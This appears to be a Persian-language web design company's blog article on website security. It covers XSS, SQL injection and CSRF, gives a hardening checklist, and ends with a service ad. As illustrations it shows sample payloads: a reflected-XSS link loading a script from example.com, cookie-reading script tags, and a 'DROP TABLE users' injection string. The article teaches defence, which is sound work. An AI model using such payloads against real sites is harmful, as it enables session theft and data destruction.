امنیت سایت چیست و چگونه آن را تامین کنیم؟

امنیت سایت چیست؟

به کلیه اقداماتی که موجب ایجاد یک بستر مناسب برای رشد و بهبود امنیت یک سایت شود، :امنیت سایت" گفته می‌شود. این اقدامات در چند بخش مختلف قرار می گیرند و هر کدام از بخش ها به خودی خود اهمیت بسیار بالایی دارد توجه کنید که هر کدام از بخش ها اگر دچار مشکل شود، امنیت بقیه بخش ها را نیز به مخاطره خواهد انداخت ما در اینجا چند مورد از بخش هایی که باید امنیت بالایی داشته باشند تا سایت شما دچار مشکلات امنیتی نشود به ترتیب اعلام می کنیم

1. امنیت هاست یا سرور: یکی از مواردی که بیشترین ضربات را ایجاد می کند ایمن نبود و امنیت پایین هاست یا سرور می تواند باشد و در صورت ایجاد رخنه تمام اطلاعات شما از بین خواهد رفت. توجه به این موضوع برای ادامه حیات و حفظ اعتبار سایت شما ضروری است.

2. امنیت دیتابیس: همه می دانیم که دیتابیس نیز سطوح امنیتی مختلفی دارد و باید با استفاده از رمز و پسورد قوی محافظت شود دقت کنید حتما دسترسی ریموت به دیتابیس را همیشه قفل کنید همچنین اجرای بعضی از دستورات که از نوع مخرب محسوب می شوند باید قطع شود.
3. امنیت cms، زبان یا فریمورک برنام نویسی: مرحله بعدی که باید دقیق مورد بررسی قرار بگیرد خود سایت شماست و نداشتن مطالعه در مورد نحوه حملات به آن و عدم اطلاع از رخنه های موجود در زبان بکار گرفته سایت می تواند ضررهای جبران ناپذیری ایجاد کند همیشه سعی کنید زبان، cms و یا فریمورک مورد استفاده را به روز رسانی کنید. همچنین کدهای نوشته شده خود را از لحاظ اتک مهاجمان بررسی کنید گاهی مشکلات و باگ ها از سمت خود برنامه نویس هم می تواند ایجاد شود!
4. آموزش نیرو: گام بعدی که گزارشات متعددی از این بخش در شرکت های مختلف به ما می رسد مشکل عدم رازداری و عدم دانش نیرو است که به راحتی اطلاعات حساس را در احتیار افراد دیگر قرار می دهند که موجب دسترسی های غیرمجاز می شود حتما به نیرو های خود در این زمینه آموزش های لازم را ارائه کنید

راه های افزایش امنیت سایت به صورت ساده

همیشه نیاز به متخصص بودن نیست برخی از کارهای امنیتی به سادگی قابل انجام هست سعی کنید تمام موارد ساده ذیل را از شرکت مربوطه خود دریافت کنید.

1. استفاده از CDN مناسب: مثل کلودفلر که جلوگیری می کند از حملات DDos و همیشه کپی وبسایت شما در سرورهای دیگر قرار دارد و و سرور اصلی برای هکر به راحتی قابل تشخیص نخواهد بود.
2. انتخاب هاست و یا سرور با امنیت بالا: شما هرچقدر هم که وبسایت خوبی داشته باشید اما فضای میزبانی شما مثل هاست و سرور دارای امنیت خوبی نباشد همه زحمات خود را بر باد رفته بدانید شرکت های هاستینگ باید امنیت را از سمت خود تضمین کنند و با ارتقا سخت افزارهای شبکه ای و نرم افزاری مثل فایروالها در صدد جلوگیری و ایجاد رخنه باشند توجه کنید بکاپ روزانه یکی از راه های بازگرداندن اطلاعات است و جزو اولین موارد حیاتی خود برای انتخاب هاست قرار بدید سعی کنید پیشینه هاستینگ، سرور و خدمات ابری مورد نظر رو بررسی کنید در شبکه های اجتماعی عموما سرویس های ضعیف معرفی می گردند
3. استفاده از نسخه پایدار زبان برنامه نویسی سایت: با گذشت زمان این یک مورد عادی است که در موارد قدیمی باگ هایی کشف می شود و نیاز هست زبان مورد نظر ارتقا داده شود عموما در هاست ها و سرورهای امروزه شما به راحتی می توانید از نسخه های مختلف یک زبان استفاده کنید مثلا نسخه 5.6 php دارای باگهای بسیاری است و بهتر است شما از نسخه 8 به بالا استفاده کنید. (در تایم نگارش این مقاله نسخه 8 php آخرین نسخه منتشر شده بوده است)
4. به روز رسانی cms وبسایت: بیشتر وب توسط cms وردپرس در حال سرویس دهی است و این cms همیشه نیازمند آپدیت شدن است اگر طراحی وبسایت وردپرس سفارش داده اید حتما تاکید کنید که خود وردپرس آخرین نسخه و بر روی آخرین نسخه php قابل اجرا باشد همیشه به یاد داشته باشید در سایتهای وردپرسی بیشترین ضعف از سمت افزونه و قالب نال شده است چون هکرها از عدم آپدیت این موارد نهایت استفاده را می کنند.
5. انتخاب فریم ورک مناسب: اگر جزو شرکت هایی هستید که ترجیح می دهید طراحی اختصاصی برای شما انجام شود بهتر است فریم ورک لاراول یا جنگو را انتخاب کنید این فریمورک ها در بالاترین سطح امنیتی قرار دارند و قابلیت سرویس دهی برای انواع دستگاه های مختلف را با ایجاد توکن های مختلف و غیرقابل رمزگشایی را دارند توجه کنید فریم ورک هم باید به صورت زمانی آپدیت شود.
6. تیم مناسب پشتیبانی: عموما طراحی سایت توسط یک فرد، شرکت یا مجموعه انجام می شود که یکی از وظایف تیم طراحی مورد پیاده سازی دقیق امنیت در کدنویسی یا cms است خدمات پشتیبانی (سایت) شامل مواردی مثل: بررسی امنیت از سمت خود سایت، به روزرسانی فریم ورک یا cms استفاده شده و ... است

معنی امنیت سایت

معنی امنیت در وب سایت یعنی هوشیاری در تمام جنبه های طراحی و استفاده از وب سایت. این مقاله شما را به یک متخصص امنیت وب سایت تبدیل نمی کند، اما به شما کمک می کند بفهمید که تهدیدات از کجاست و چه کاری می توانید انجام دهید تا وب سایت خود را در برابر رایج ترین حملات امن تر کنید.

تهدیدات امنیتی برای وب سایت

تهدیدات امنیتی یک الی دو مورد نیست و ما در زمان نگارش این مقاله مواردی که یافت کرده ایم را برای شما می نویسیم حتما دقت کنید که در آینده امکان دارد مواردی به این لیست اضافه شود پس سعی کنید در زمینه تهدیدات سایت مطالعه مستمر داشته باشید.

امنیت سایت در برابر حملات xss

XSS اصطلاحی است که برای توصیف دسته ای از حملات استفاده می شود که به مهاجم یا هکر اجازه می دهد تا اسکریپت های سمت کلاینت را از طریق وبسایت به مرورگرهای سایر کاربران تزریق کند. از آنجایی که کد تزریق شده از سایت به مرورگر می آید، کد مورد اعتماد است و می تواند کارهایی مانند ارسال کوکی مجوز سایت کاربر برای مهاجم را انجام دهد. هنگامی که مهاجم کوکی را داشته باشد، می‌تواند وارد سایتی شود که انگار همان کاربر است و هر کاری که کاربر می‌تواند انجام دهد، مانند دسترسی به جزئیات کارت اعتباری، دیدن جزئیات تماس، یا تغییر رمز عبور.

نکته: بیشترین آسیب پذیری در وب از طریق حملات xss بوده است!

آسیب‌پذیری‌های XSS بر اساس اینکه سایت چگونه اسکریپت‌های تزریق‌شده را به مرورگر برمی‌گرداند، به دو دسته منعکس شده و پایدار تقسیم می‌شوند .

• یک آسیب‌پذیری بازتاب‌شده XSS زمانی رخ می‌دهد که محتوای کاربر که به سرور ارسال می‌شود بلافاصله برگردانده شود و برای نمایش در مرورگر تغییر داده نشود. هر اسکریپت در محتوای اصلی کاربر هنگام بارگیری صفحه جدید اجرا می شود. به عنوان مثال، یک تابع جستجوی سایت را در نظر بگیرید که در آن عبارات جستجو به عنوان پارامترهای URL کدگذاری می شوند و این عبارات همراه با نتایج نمایش داده می شوند. یک مهاجم می تواند پیوند جستجویی بسازد که حاوی یک اسکریپت مخرب به عنوان یک پارامتر باشد و آن را برای کاربر دیگری ایمیل کنید. اگر کاربر هدف روی این "لینک جالب" کلیک کند، اسکریپت با نمایش نتایج جستجو اجرا می شود. همانطور که قبلاً بحث شد، این به مهاجم تمام اطلاعاتی را می دهد که برای ورود به سایت به عنوان کاربر هدف، به طور بالقوه خرید به عنوان کاربر یا اشتراک گذاری اطلاعات تماس خود، نیاز دارند.

http://developer.mozilla.org?q=beer<script%20src="http://example.com/tricky.js"></script>

برخی از موارد از این حملات به ترتیب ذیل است:

{search_term_string}

var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));

<script>alert('Was Here!!')</Script>

<script>alert(document.cookie)</script>

Site.com/welcome.htm?name=<script>cod1</script>&name=<script>cod2</script>

• یک آسیب‌پذیری پایدار XSS زمانی رخ می‌دهد که اسکریپت مخرب در وبسایت ذخیره می‌شود و بعداً بدون تغییر برای سایر کاربران نمایش داده می‌شود تا ناخواسته اجرا شوند. به عنوان مثال، بخش نظرات صفحه که حاوی HTML اصلاح نشده است، می تواند یک اسکریپت مخرب از یک مهاجم را ذخیره کند. هنگامی که نظرات نمایش داده می شود، اسکریپت اجرا می شود و می تواند اطلاعات مورد نیاز برای دسترسی به حساب کاربر را برای مهاجم ارسال کند. این نوع حمله بسیار محبوب و قدرتمند است، زیرا مهاجم حتی ممکن است هیچ ارتباط مستقیمی با قربانیان نداشته باشد.

در حالی که درخواست های POST یا GET رایج‌ترین منبع آسیب‌پذیری‌های XSS هستند، هر داده از مرورگر می تواند به طور بالقوه آسیب‌پذیری ایجاد کند، مانند داده‌های کوکی ارائه‌شده توسط مرورگر، یا فایل‌های کاربر که آپلود و نمایش داده می‌شوند.

بهترین دفاع در برابر آسیب پذیری های XSS د حذف یا غیرفعال کردن هر نشانه گذاری است که به طور بالقوه می تواند حاوی دستورالعمل هایی برای اجرای کد باشد. برای HTML این شامل عناصری مانند <script>،،، <object>و <embed>.<link>

فرآیند اصلاح داده‌های کاربر به‌گونه‌ای که نتوان از آن برای اجرای اسکریپت‌ها استفاده کرد یا بر اجرای کد سرور تأثیر بگذارد، به عنوان پاکسازی ورودی (input sanitization) شناخته می‌شود. بسیاری از فریم ورک های وب به طور پیش فرض ورودی کاربر از فرم های HTML را به طور خودکار پاکسازی می کنند.

امنیت در برابر حملات SQL injection (تزریق کدهای sql)

آسیب‌پذیری‌های SQL injection به هکران امکان می‌دهد تا کد SQL دلخواه را در پایگاه داده شما اجرا کنند و به داده‌ها اجازه دسترسی، اصلاح یا حذف بدون توجه به مجوزهای کاربر را می‌دهند. یک حمله injection موفق ممکن است کاربران را جعل و کاربرانی جدید ایجاد کند(هویت های جدیدی با سطح دسترسی مدیریت)، به همه داده های روی سرور دسترسی داشته باشد یا داده ها را از بین ببرد یا تغییر دهد تا غیرقابل استفاده شود.

انواع تزریق SQL شامل مبتنی بر خطا (Error-based SQL injection)، تزریق SQL بر اساس خطاهای بولی (boolean errors) و تزریق SQL مبتنی بر زمان (Time-based) است.

این آسیب‌پذیری وقتی ایجاد می شود که هکر ورودی دستوری ارسال کند که تغییر معنای ایجاد کند. به عنوان مثال، کد زیر برای فهرست کردن همه کاربران با یک نام خاص (userName)  است که از یک فرم HTML ارسال می شود:

statement = "SELECT * FROM users WHERE name = '" + userName + "';"

دستور بالا مشخص می کند که کاربری وارد شده آیا در دیتابیس هست یا خیر که هکر می‌تواند رفتار این دستور SQL را به دستور جدید در مثال زیر تغییر دهد

SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';

دستور اصلاح شده یک دستور SQL معتبر ایجاد می کند که جدول users را حذف می کند و تمام داده ها را از userinfo جدول انتخاب می کند (که اطلاعات هر کاربر را نشان می دهد). این کار به این دلیل کار می کند که قسمت اول متن تزریق شده ( a';) عبارت اصلی را کامل می کند.

برای جلوگیری از این نوع حمله، باید اطمینان حاصل کنید که هر داده یا ورودی کاربر که به یک پرس و جوی SQL ارسال می شود، نمی تواند ماهیت پرس و جو را تغییر دهد. یکی از راه های انجام این کار محدود کردن کاراکترهای ورودی کاربر است که در SQL معنای خاصی دارند.

نکته: دستور SQL کاراکتر ' را به عنوان آغاز و پایان یک رشته تحت اللفظی در نظر می گیرد. با قرار دادن یک بک اسلش در مقابل این کاراکتر ( \' )، از نماد فرار می کنیم و به SQL می گوییم که در عوض آن را به عنوان یک کاراکتر (فقط بخشی از رشته) در نظر بگیرد.

در عبارت زیر کاراکتر ' خنثی می کنیم. SQL اکنون نام را به صورت کل رشته به صورت پررنگ تفسیر می کند (که در واقع یک نام بسیار عجیب است، اما مضر نیست).

SELECT * FROM users WHERE name = 'a\';DROP TABLE users; SELECT * FROM userinfo WHERE \'t\' = \'t';

امنیت در برابر حملات جعلی csrf

حملات CSRF به کاربر مخرب این امکان را می دهد که بدون اطلاع یا رضایت کاربر، اقداماتی را با استفاده از اعتبار کاربری دیگر انجام دهد.

این نوع حمله به بهترین شکل با مثال توضیح داده می شود. آروان یک کاربر مخرب است که می‌داند یک سایت خاص به کاربرانی که وارد شده‌اند اجازه می‌دهد با استفاده از یک درخواست POST که شامل نام حساب و مقداری پول است، پول را به یک حساب مشخص ارسال کنند. آروان فرمی می سازد که شامل اطلاعات بانکی و مقداری پول به عنوان فیلدهای مخفی است و آن را برای سایر کاربران سایت ایمیل می کند (با دکمه ارسال که به عنوان پیوندی به یک سایت "سریع پولدار شوید").

اگر کاربر روی دکمه ارسال کلیک کند، یک درخواست POST حاوی جزئیات تراکنش و هر کوکی سمت کلاینت که مرورگر با سایت مرتبط است به سرور ارسال می‌شود (افزودن کوکی‌های سایت مرتبط به درخواست‌ها رفتار عادی مرورگر است). سرور کوکی‌ها را بررسی می‌کند و از آن‌ها برای تعیین اینکه آیا کاربر وارد شده است و اجازه انجام تراکنش را دارد یا خیر، استفاده می‌کند.

نتیجه این است که هر کاربری که هنگام ورود به سایت معاملاتی روی دکمه ارسال کلیک کند، معامله را انجام می دهد. آروان پولدار میشه!

نکته: ترفند اینجاست که آروان نیازی به دسترسی به کوکی های کاربر (یا دسترسی به اعتبار) ندارد. مرورگر کاربر این اطلاعات را ذخیره می کند و به طور خودکار آن را در تمام درخواست های سرور مرتبط گنجانده است.

یکی از راه‌های جلوگیری از این نوع حمله این است که درخواست‌های POST شامل یک توکن ایجاد شده توسط کاربر خاص باشد. توکن هنگام ارسال فرم وب مورد استفاده برای انتقال، توسط سرور ارائه می شود. این رویکرد آروان را از ایجاد فرم خود باز می دارد، زیرا او باید توکنی را که سرور برای کاربر فراهم می کند بداند. حتی اگر او توکن را کشف کند و یک فرم برای یک کاربر خاص ایجاد کند، دیگر نمی تواند از همان فرم برای حمله به هر کاربر استفاده کند.

فریم ورک های وب اغلب شامل چنین مکانیسم های پیشگیری از CSRF می شوند.

چک لیست بررسی امنیت سایت

برای ایجاد امنیت سمت سایت باید مواردی همیشه چک شود تا از حملات هکرها تا حد زیادی جلوگیری کنید یا حداقل اگر هک شدید آبرومندانه باشد! در ذیل یک چک لیست کامل سعی کرده ایم ارائه کنیم:

1. ایجاد محدودیت لاگین برای آی پی: برای بخش های مهم سایت مثل لاگین ادمین حتما محدودیت آی پی ایجاد کنید در این روش مدیر باید از یک آی پی ثابت برای لاگین استفاده کند که هکر در مرحله اول دسترسی به صفحه لاگین را ندارد و محدودیت های چند مرحله ای را تجربه خواهد کرد.
2. استفاده از کپچا: کپچا کمک می کند که ربات تشخیص داده شود و خیلی از حملات و راه های یافتن نفوذ در سایت شما برای هکر زمانبر شود به عبارتی ایجاد فرسودگی کند.
3. استفاده از توکن csrf: توکن csrf یک کد رمزگذاری شده است که فقط روی سایت شما معتبره و در درخواست هایی به صورت post ارسال می شود و از حملات وسیع جلوگیری می کند.
4. استفاده از گواهی ssl معتبر: گواهی ssl اجازه انتقال سایت شما از http به https است که یک فایل رمزنگاری شده روی سرور با کلیدهای دسترسی عمومی و خصوصی می باشد که به سایت شما هویت می بخشد. امروزه داشتن این مورد برای تمام سایت اجباری است و مرورگرها سایتهای بدون https را بعنوان اسپم به کاربر اطلاع می دهند و از بازدید سایت مورد نظر توسط کاربر جلوگیری می کنند.
5. تغییر مسیر لاگین مدیریت: آدرس های پیش فرض ورود و ثبت نام را همیشه تغییر دهید و حتما از معرفی این آدرس ها در نقشه سایت جلوگیری کنید همیشه به یاد داشته باشید موتورها جستجو می توانند این موارد را کشف کنند برای همین این صفحات را حتما نوایندکس و از دادن هر نوع لینک داخلی در سایت به این صفحات جلوگیری کنید.
6. رمز عبور قدرتمند: چه مدیریت و چه کاربران عادی را حتما مجبور به تولید پسورد قوی کنید پسوردهای عادی مثل 123456 و ... بیشترین پسوردهای حال حاضر استفاده شده توسط افراد هستند و همیشه پیش فرض ربات ها برای چک کردن قرار می گیرند برای همین احتمال هک سایت را بسیار بالا می برند.
7. تغییر دوره ای رمز عبور: همیشه در نظر داشته باشید که امکان دارد اطلاعات حساس مثل پسورد را در کنار دوستان خود بازگو کنید و روزی همین دوستان شما دشمنان آینده شوند! برای همین پسورد های دسترسی خود به تمام بخش ها را به صورت دوره ای تغییر دهید.
8. تعیین سطوح دسترسی (ACL): سطوح دسترسی برای هر بخشی مرحله دوم خواهد بود که کمک می کند هکر دردسر بیشتری را حس کند با سطوح دسترسی برای هر بخش مثل: امکان نمایش تکی، لیست، حذف، ویرایش و ... محدودیت هایی خیلی زیادتری ایجاد میکنید و از حذف و سرقت اطلاعات تا حد زیادی می توانید جلوگیری کنید.
9. به روز رسانی پلاگین های امنیتی: اشاره کردیم بیشتر سایت ها با وردپرس و دیگر cms ها پیاده سازی شده است و این cms ها دارای پلاگین های مختلفی برای ایجاد امنیت هستند که باید نصب و به روز رسانی گردند دقت کنید نصب افزونه ها باید با دلیل و منطق انجام شود چرا که خود این افزونه ها می توانند کمک به ایجاد راه های رخنه و هک سایت شوند.
10. پیاده سازی عملیات حذف نرم: سالهاست که برنامه نویس های حرفه ای دیگر به صورت واقعی حذف نمی کنند و اصطلاحا عملیات حذف نرم را انجام می دهند یعنی اطلاعات در دیتابیس می ماند ولی از دید پنل مدیریت مخفی می شود این کار کمک میکند بعد از اعمال خرابکارانه هکرها امکان بازگردانی دیتا ها وجود داشته باشد
11. بکاپ دائم و روزانه: بکاپ گیری دائم عموما توسط خود شرکت هاستینگ انجام می شود ولی محض احتیاط همیشه یک نسخه جدید از آخرین اطلاعات هاست رو در هر 10 روز یکبار دانلود و در جایی امن ذخیره کنید.
12. امنیت فایل های پیکربندی: نسبت به زبان مورد استفاده برای طراحی سایت بهتر است فایل های پیکربندی در سایت را در حالت امنیتی قرار دهید دقت کنید این موارد عموما توسط هاستینگ انجام می شود مثال از فایل پیکربندی در زبان php برای وب سرویس آپاچی فایل htaccess است.
13. تغییر پورت های پیش فرض: پورت 80 در وب همیشه در دسترس عموم قرار دارد برای افزایش سطح امنیت سایت بهتر است برای برخی از بخش ها مثل دسترسی ssh شماره پورت را تغییر دهید.
14. تست دوره ای امنیت سایت: همیشه سعی کنید هر ماه یکبار امنیت سایت را با استفاده از ابزارهای مختلف بررسی کنید تا ساده ترین موارد امنیتی را رعایت و به سادگی مورد هجوم هکرها قرار نگیرید
15. استفاده از cdn: حتما برای جلوگیری از حملات DDos قبل از اعتماد به هاستینگ خودتون دست به کار شده و cdn مناسب برای سایت خود تهیه کنید.

ابزارهای تست آنلاین امنیت سایت

ابزارهای مختلفی برای تست امنیت می توانید در اینترنت یافت کنید در کل نگران این مورد نباشید که مواردی از امنیت سایت شما امکان دارد افشا شود و هر باگی که می بینید را سریع برطرف کنید. این لیست کمک می کند تا با برخی از این ابزارهای آشنایی پیدا کنید

• سایت sitecheck.sucuri.net
• سایت ssllabs.com/ssltest
• سایت quttera.com
• سایت siteguarding.com

مطالعه بیشتر در مورد امنیت وردپرس

خدمات جاب تیم برای بررسی امنیت وب سایت

ما در مجموعه جاب تیم این امکان را برای مشتریان عزیزمان ایجاد کرده ایم که بتوانند از سرویس های ما برای امنیت سایت خود استفاده کنند برای سفارش بررسی وب سایت خود می توانید از طریق تماس مستقیم یا واتساپ اقدام کنید.

بررسی امنیت سایت با مرورگر کروم

برای اطلاع از امنیت یک سایت می‌توانید اطلاعات امنیتی سایت را بررسی کنید. اگر نتوانید به‌صورت ایمن و خصوصی از سایت مورد نظر بازدید کنید، مرورگر Chrome به شما هشدار خواهد داد.

1. یک صفحه جدید در مرورگر کروم باز کنید
2. برای بررسی امنیت سایت، در سمت راست آدرس بار (در زبان انگلیسی سمت چپ)، نماد وضعیت امنیت را بررسی کنید:
   •  ایمن
   •  اطلاعات یا ناامن
   •  ناامن یا خطرناک
3. برای دیدن خلاصه‌ای از جزئیات حریم خصوصی سایت و اجازه‌ها، روی گزینه قفل کلیک کنید.